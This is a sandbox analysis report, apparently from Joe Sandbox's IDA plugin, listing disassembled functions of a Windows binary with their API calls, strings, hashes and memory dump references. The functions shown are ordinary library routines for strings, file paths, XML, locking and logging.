                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 0178deb9723ec45d370185ea4778a587d4a8e4194ba42d28eb8c05566d5988a5
                • Instruction ID: 861da34c49eac7f47e44cae58a259aae1ccd9010de67640e1cca73a94db8f45e
                • Opcode Fuzzy Hash: 0178deb9723ec45d370185ea4778a587d4a8e4194ba42d28eb8c05566d5988a5
                • Instruction Fuzzy Hash: 3301473221A3926EA6212B777CC56573B44EB41734320032AF53C852F1EFA24E0A6160
                Function 00CAA794 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA79B
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7A7
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7B7
                • ?rfind@?$CStringT@_W@Cmm@@QBEI_WI@Z.RWSNDPQSKZ(0000002E,000000FF,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7C6
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7DE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,0000003C,00CAAF57,?,0000003C), ref: 00CAA7F6
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$??0?$Compare@?$$?rfind@?$DeallocateH_prolog3_V01@V01@@
                • String ID:
                • API String ID: 4232220682-0
                • Opcode ID: 402d6d1aac398b536132d0bd550d5cd595503d49ded56db071aff824c6525bd0
                • Instruction ID: f8fa7d26f289dff37dc48c91614dd2a8d0fc854328bad5c05e56ce8b129d2410
                • Opcode Fuzzy Hash: 402d6d1aac398b536132d0bd550d5cd595503d49ded56db071aff824c6525bd0
                • Instruction Fuzzy Hash: 26012839A002155BCB14AB74DC426EDB2245F45725F044325EC32762C2EF749B8AD725
                Function 00C780B0 Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON
                Download Yara Rule
                APIs
                • ?Stop@CIPCChannelThread@ssb_ipc@@QAEHXZ.RWSNDPQSKZ ref: 00C780C6
                • EnterCriticalSection.KERNEL32(?), ref: 00C780D3
                • LeaveCriticalSection.KERNEL32(?), ref: 00C780DD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00C780FD
                • ??1Channel@ssb_ipc@@QAE@XZ.RWSNDPQSKZ ref: 00C78112
                • ?Detach@CThread@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00C7811A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@CriticalSection$ChannelChannel@ssb_ipc@@Detach@EnterLeaveState@Stop@Thread@Thread@ssb_ipc@@Unlock@
                • String ID:
                • API String ID: 360572120-0
                • Opcode ID: 82745fd74b46d8eef38317a0795512dedecc064900e4ca93d552d5039da7031b
                • Instruction ID: afef9fdb0906a9c1e22c460717f9f42ad29ebc5fb409069c0ec7c1a622dd95fb
                • Opcode Fuzzy Hash: 82745fd74b46d8eef38317a0795512dedecc064900e4ca93d552d5039da7031b
                • Instruction Fuzzy Hash: 1101F935640710ABCB15EF65C89A9AE7779AF457107048058FE069B355CFB0ED09E7B0
                Function 00CAAEB0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CAAEB7
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAECA
                • ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEDB
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB78F
                  • Part of subcall function 00CAB760: ?IsSeparator@FilePath@Cmm@@SA_N_W@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CAAE10,?,00000008,00CAA957,?), ref: 00CAB7B8
                • ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEF1
                • ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF01
                • ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF1A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$FilePath@$?erase@?$Separator@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$??0?$?find_last_of@?$H_prolog3Internal@SeparatorsStripTrailingV01@@
                • String ID:
                • API String ID: 204599755-0
                • Opcode ID: e933c5611c5e776bc9265b738b5b3dff8f4ab2337bde28edcbd29a7f85b18879
                • Instruction ID: bcdbaf4457a71a3f60a72720c39d685d4842b9acaceaf61fc2d8559a8364b81f
                • Opcode Fuzzy Hash: e933c5611c5e776bc9265b738b5b3dff8f4ab2337bde28edcbd29a7f85b18879
                • Instruction Fuzzy Hash: 7DF0A4747045155BCE1CB769881657EE1959FD1B28F20030EF226972D1DFB04E86939A
                Function 00CB2000 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                Download Yara Rule
                APIs
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB2012
                • ?NewElement@XMLDocument@tinyxml2@@QAEPAVXMLElement@2@PBD@Z.RWSNDPQSKZ(00000000), ref: 00CB201A
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000), ref: 00CB2029
                  • Part of subcall function 00CAFC00: ?CollapseWhitespace@StrPair@tinyxml2@@AAEXXZ.RWSNDPQSKZ ref: 00CAFD38
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ(00000000), ref: 00CB2033
                • ?FindOrCreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@PBD@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB203B
                  • Part of subcall function 00CB1C30: ?CreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@XZ.RWSNDPQSKZ ref: 00CB1C67
                  • Part of subcall function 00CB1C30: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000010,00000000), ref: 00CB1C82
                • ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000,00000000,00000000), ref: 00CB2046
                  • Part of subcall function 00CAFA70: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(000003E8,00000001,00000000,?,00CB2987,00000000,00000000), ref: 00CAFA78
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Pair@tinyxml2@@$Str@$Attribute@Attribute@2@CreateElement@tinyxml2@@$CollapseDocument@tinyxml2@@Element@Element@2@FindNode@tinyxml2@@Reset@Value@Whitespace@
                • String ID:
                • API String ID: 3780913149-0
                • Opcode ID: abb86da71ec74ef795c4d604ec96bdd72c31f4a2b7bc9d47c008fc3e50b7d550
                • Instruction ID: e55ade2261dc42d0eb523d01b89f757ea3facb73e71e1463b983584d612f2aa3
                • Opcode Fuzzy Hash: abb86da71ec74ef795c4d604ec96bdd72c31f4a2b7bc9d47c008fc3e50b7d550
                • Instruction Fuzzy Hash: 15F02E322006223BC214BA64DC01ADAB36CBFA8374B120139F806A3641CF70FD12E7E0
                Function 00CDE616 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 262COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CDE61D
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00A00000,00000000,?,00000000,0000001C,00CE0252,?,?,00000000,00000000,00000000), ref: 00CDE668
                • GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,dbghelp.dll,00000000,00000000,00000000,00000000,00000000,?), ref: 00CDE749
                  • Part of subcall function 00CDE975: __EH_prolog3.LIBCMT ref: 00CDE97C
                  • Part of subcall function 00CDCF54: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,00CDCBB8,?,?,?,?,00CDE13E,00000000,?,?,00000028,00CDCA03,?,?), ref: 00CDCF62
                  • Part of subcall function 00CDCF54: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000002,?,?,00CDE13E,00000000,?,?,00000028,00CDCA03,?,?,?,?,?,?), ref: 00CDCF8C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$H_prolog3Process$CreateCurrentFileHeapMapping
                • String ID: Couldn't create shared memory view.$Couldn't initialize shared memory.
                • API String ID: 268392948-658901668
                • Opcode ID: 5679805183df39deecf0841e3548aefff9e12d80005335d281624ca2803413d4
                • Instruction ID: 261d172ea10622f0e7bd9f1c6466360e7cc2ce249e4e53eb25339a868a1c1b2d
                • Opcode Fuzzy Hash: 5679805183df39deecf0841e3548aefff9e12d80005335d281624ca2803413d4
                • Instruction Fuzzy Hash: F3B14E719102418FDB54EF68C495BAD7BE1AB08310F1589BEEA4EAF342DB309D44DBA0
                Function 00CD4020 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 158libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(ntdll.dll,LdrUnregisterDllNotification), ref: 00CD4059
                • GetProcAddress.KERNEL32(00000000), ref: 00CD4060
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CD4074
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AddressCmm@@HandleModuleProcState@Unlock@
                • String ID: LdrUnregisterDllNotification$ntdll.dll
                • API String ID: 2495340779-237666150
                • Opcode ID: bde03ba296c5749fabb7f12327a591864e34d3dbad9c4805d21d6767b550b782
                • Instruction ID: eb12e2245ac4214fa1f6d66d840f62099e9590680b3cc94c3d90668bba9eddbb
                • Opcode Fuzzy Hash: bde03ba296c5749fabb7f12327a591864e34d3dbad9c4805d21d6767b550b782
                • Instruction Fuzzy Hash: CF518C31610542ABE70C9B38CC99BFDF7A6FB44344F544329E229877A1DB38A965CB90
                Function 00D040F6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00D0E2DF), ref: 00D0410F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,?), ref: 00D04283
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000002,?,?), ref: 00D042C9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@$DecodePointer
                • String ID: log
                • API String ID: 1417264913-2403297477
                • Opcode ID: e623d47c890d1a7b2514a68fd4b6e9ce1bb581c5f784d436c6dcc27bfef20348
                • Instruction ID: 6bb314764f7fc4e078fca42e9356d80e83f248d98e0f7c0c5a6e287c6ac79885
                • Opcode Fuzzy Hash: e623d47c890d1a7b2514a68fd4b6e9ce1bb581c5f784d436c6dcc27bfef20348
                • Instruction Fuzzy Hash: E051D3B4A0461EDBCF209FA9E84CABD7F70FF55308F154044E698A7294CB308965CB79
                Function 00C646A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C646AA
                  • Part of subcall function 00C526E4: __EH_prolog3.LIBCMT ref: 00C526EB
                • ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(?,?,0000FDE9,?,?,?), ref: 00C6478C
                • ?cmm_str_convert@@YAIHPADIHPBDI@Z.RWSNDPQSKZ(00000000,00000000,?,?,0000FDE9,?,?,?), ref: 00C64793
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,00000000,00000000), ref: 00C647B8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$?cmm_str_convert@@Assign@?$Buffer@?$H_prolog3H_prolog3_
                • String ID: 0
                • API String ID: 3998168562-4108050209
                • Opcode ID: 6d42312ca2aa78603f3ecbb00a60f0c08b565bdc666a0c6d8020c9bded45192e
                • Instruction ID: 5f582f0efcddb719e79029c9fabc1ddb24143cabf9bdb5fd1f03a850bcf7c2ea
                • Opcode Fuzzy Hash: 6d42312ca2aa78603f3ecbb00a60f0c08b565bdc666a0c6d8020c9bded45192e
                • Instruction Fuzzy Hash: 80417274D002489FCF14EFA4C995BDDBBB8EF54301F548469E805B7242DB70AA89DF60
                Function 00C5204B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3Initstd::locale::_
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 302037079-1866435925
                • Opcode ID: 46bf783e0d36b40b3790a4d53f202e5c8178aadcb5d7150eac67881be557edaa
                • Instruction ID: 865d0c85ef9ab91b6a3a24538c840aeaa1a9623f9682d73b2b524a5111cb8a06
                • Opcode Fuzzy Hash: 46bf783e0d36b40b3790a4d53f202e5c8178aadcb5d7150eac67881be557edaa
                • Instruction Fuzzy Hash: 692108B2900705BFD704EF66D482B99B7E4FF08300F54412EE9189B6C2DBB4A994CBD4
                Function 00CBEAEB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CBEAF2
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28,00DFFA28,00DFFA28,00DFFA28,?,00CBEE52,00000000,00000000,?), ref: 00CBEB14
                • ?cmm_fs_read@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(00DFFA28,00000054,last_log_file_id.txt,00D3D264,?,00D35050,00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28), ref: 00CBEB72
                  • Part of subcall function 00C62D90: __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C62D90: ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C62D90: ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                  • Part of subcall function 00C62D90: ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                  • Part of subcall function 00C62D90: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                • ?StringToInt@Cmm@@YAHABV?$CStringT@D@1@AAH@Z.RWSNDPQSKZ(?,?,00000054,last_log_file_id.txt,00D3D264,?,00D35050,00000000,00000054,00CBEDAF,00DFFA28,?,00DFFA28), ref: 00CBEBA7
                  • Part of subcall function 00C64310: ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(00000000,00000000,?), ref: 00C64339
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$File@$H_prolog3_$??0?$?cmm_fs_read@@Buffer@?$Close@Compare@?$D@1@D@2@@std@@@D@std@@DeallocateInt@Read@Size@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@@W@std@@
                • String ID: last_log_file_id.txt
                • API String ID: 3437992560-1594190529
                • Opcode ID: 6e5a2bb8319f5feb25f72d6b5d2b8f9f5940d7c6733eead3f3cccddff2b14511
                • Instruction ID: 590df38f9b3444a6c5e297ab2368bed5bd3aa4b0476de3ac564cddff2d9b41fd
                • Opcode Fuzzy Hash: 6e5a2bb8319f5feb25f72d6b5d2b8f9f5940d7c6733eead3f3cccddff2b14511
                • Instruction Fuzzy Hash: 59212475C003099FCB14EFE1D9A19DDBBB4AF14301F94842EE81272291DB70AA8DDB25
                Function 00CA6C8C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CA6CB5
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(App), ref: 00CA6CCC
                • ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z.RWSNDPQSKZ(00D3C788,App), ref: 00CA6D00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CA6D2E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
